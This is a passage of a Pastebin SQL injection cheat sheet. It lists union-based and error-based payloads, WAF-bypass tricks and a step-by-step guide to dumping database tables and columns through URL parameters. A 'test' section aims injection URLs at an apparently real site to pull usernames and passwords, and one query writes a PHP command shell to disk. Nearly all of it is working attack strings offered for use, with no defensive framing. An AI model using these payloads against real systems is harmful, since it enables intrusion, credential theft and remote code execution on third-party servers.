  701. =121)+and(0)+/*!uNion*/+/*!seleCt*/+1,2,3,4,version(),6,7– -
  702. =121)/**/and false UNION(SELECT 1,2,3,4,5,6,7)–+-
  703. =121 div 0 ) /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,version()# |
  704. null’+union+select+1,2,count(schema_name),4,5+from+information_schema.schemata– x
  705. ===================================================================================================================================
  706. Error Based:
  707. ===================================================================================================================================
  708. +or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1–
  709.  
  710. or 1 group by concat(0x3a,(select substr(group_concat(username,0x3a,password),1,150)
  711.  
  712. from rmdsz_user),floor(rand(0)*2)) having min(0) or 1– -
  713. or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1 — -
  714.  
  715. and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  716.  
  717. +AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT version() FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2)))
  718.  
  719. +and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+ 3)x+group+by+concat(mid((select+concat_ws(0x7e,version(),0x7e)+from+information_ schema.tables+limit+0,1),1,25),floor(rand(0)*2)))a)– x
  720.  
  721. or 1=convert(int,(@@version))-
  722. +or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1–
  723. +and+(select+1+from+(select+count(*),concat((select(select+concat(c ast(count(schema_name)+as+char),0x7e))+from+information_schema.schemata+limit+0, 1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
  724.  
  725. (42)and(0)union(select(1),2,version(),4,5,0x3c623e3c666f6e7420636f6c6f723d626c75653e706833776c,7,8,9,(10))–+-
  726. ===================================================================================================================================
  727. WAF BYPASS BY TOTTI
  728. ===================================================================================================================================
  729.  
  730. =-2/*1337*/UNION/*1337*/(SELECT/*1337*/1337,concat_ws(0x203a20,0x746f7474693933,table_nam e)/*1337*/FROM/*1337*/INFORMATION_SCHEMA./*!TABLES*//*1337*/WHERE/*1337*/TABLE_SCHEMA=database())– -
  731.  
  732. =2+and(0)+union+distinctROW+select+1,/*!50000CoNcaT*/(0x706833776c,0x3a,table_name) /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()– -
  733.  
  734. ===================================================================================================================================
  735. WUBI – 1,(select(@x)from(select(@x:=0×00),(select(0)from(information_schema.columns)where(table_schema!=0×69)and(0×00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2020203d3e3e202020,table_name,0x20203a3a3a32020,column_name))))x),3,4–
  736.  
  737. (select (@) from (select(@:=0×00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,’ [ ',table_schema,' ] >’,table_name,’ > ‘,column_name))))x)
  738. (select (@) from (select (@x:=0×00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x)
  739.  
  740. (select (@) from (select (@x:=0×00),(select (@) from (database.table) where (@) in (@:=concat(@,0x0a,columns)))x)
  741. ===================================================================================================================================
  742.  
  743. +and+1=convert(int,SERVERPROPERTY(‘ProductVersion’))
  744. ===================================================================================================================================
  745.  
  746. http://zerofreak.blogspot.it/…/tutorial-by-zer0freak-zer0fr…
  747.  
  748. http://www.websec.ca/kb/sql_injection
  749.  
  750. http://www.hellboundhackers.org/…/862-mysql-injection-compl…
  751.  
  752. ===================================================================================================================================
  753. test
  754.  
  755. http://www.mt.ro/nou/articol.php?id=-angajari’+and+extractvalue(rand(),concat(0x3e,(select+concat(username,0x7e,password)+from+iw_users+limit+0,1)))–+
  756.  
  757. …………………………………..
  758. http://www.mt.ro/nou/articol.php?id=-angajari’ and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=0x64625f6d74 limit 10,1),floor(rand(0)*2))x from information_schema.tables group by x)a)–+
  759.  
  760. SELECT “<? system($_REQUEST['cmd']); ?>”
  761. INTO OUTFILE “full/path/here/cmd.php”
  762.  
  763. _____________________________________________________
  764.  
  765. for more exclusive hacking tutorials visit : http://bit.ly/1Mfv5G3
  766. ==============================
  767. SqL Injection Commad
  768. ==============================
  769. Get Columns Number
  770. ==============================
  771. +order+by+
  772. ==============================
  773. get infected column
  774. ==============================
  775. +union+select+
  776. ==============================
  777. Get database name
  778. ==============================
  779. Database()
  780. ==============================
  781. Get database version
  782. ==============================
  783. Version()
  784. ==============================
  785. get database user
  786. User()
  787. ==============================
  788. get all tables
  789. ==============================
  790. Place this command on the infected collum
  791. ==============================
  792. group_concat(table_name)
  793. ==============================
  794. place this command on the final of the url
  795. ==============================
  796. +from+information_schema.tables+where+table_schema =database()--
  797. ==============================
  798. get all columns
  799. ==============================
  800. Place this command on the infected collum
  801. ==============================
  802. group_concat(column_name)
  803. ==============================
  804. place this one on the final of the link
  805. ==============================
  806. +from+information_schema.columns+where+table_schem a=database()--
  807. ==============================
  808. Bypass WAD
  809. ==============================
  810. Union Select WAF bypass
  811. ==============================
  812. Add this filter
  813. ==============================
  814. /*! */
  815. ==============================
  816. to
  817. ==============================
  818. select
  819. ==============================
  820. to be
  821. ==============================
  822. /*!select*/
  823. ==============================
  824. if it was not successfully change this
  825. ==============================
  826. select
  827. ==============================
  828. to
  829. ==============================
  830. /*!SeLeCt*/
  831. ==============================
  832. Capital and small letters
  833. ==============================
  834. Bypass WAF when getting tables
  835. ==============================
  836. Change this
  837. ==============================
  838. select
  839. ==============================
  840. to this
  841. ==============================
  842. /*!SeLeCt*/
  843. ==============================
  844. and this
  845. ==============================
  846. group_concat(table_name)
  847. ==============================
  848. to this
  849. ==============================
  850. /*!GrOuP_CoNcAT(table_name)*/
  851. ==============================
  852. and place this on the finish of the url
  853. ==============================
  854. +from+information_schema.tables+where+table_schema =database()--
  855. ==============================
  856. Bypass WAF when getting Columns
  857. ==============================
  858. change this
  859. ==============================
  860. select
  861. ==============================
  862. to this
  863. ==============================
  864. /*!SeLeCt*/
  865. ==============================
  866. change this
  867. ==============================
  868. group_concat(column_name)
  869. ==============================
  870. to this
  871. ==============================
  872. /*!GrOuP_CoNcAT(column_name)*/
  873. ==============================
  874. and place this on the final of the link
  875. ==============================
  876. +from+information_schema.columns+where+table_schem a=database()--
  877. ==============================
  878. to be like this
  879. ==============================
  880. +
  881. ==============================
  882. from+information_schema./*!columns*/+where+table_schema=database()--
  883. ==============================
  884. Additional command for waf bypass
  885. ==============================
  886. place this on the infected collumn
  887. ==============================
  888. concat(unhex(hex(concat(table_name,0x3a,column_nam e,0x3a,table_schema))))
  889. ==============================
  890. and place this on the finish of the link
  891. ==============================
  892. +from+information_schema.columns--
  893. ==============================
  894. columns number can't be shown ?
  895. ==============================
  896. add this
  897. ==============================
  898. +--+
  899. ==============================
  900. to the finish of the url
  901. ==============================
  902. and add this
  903. ==============================
  904. '
  905. ==============================
  906. after
  907. ==============================
  908. .php?id=1
  909. ==============================
  910. to be like this
  911. ==============================
  912. .php?id=1'
  913. ==========================
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!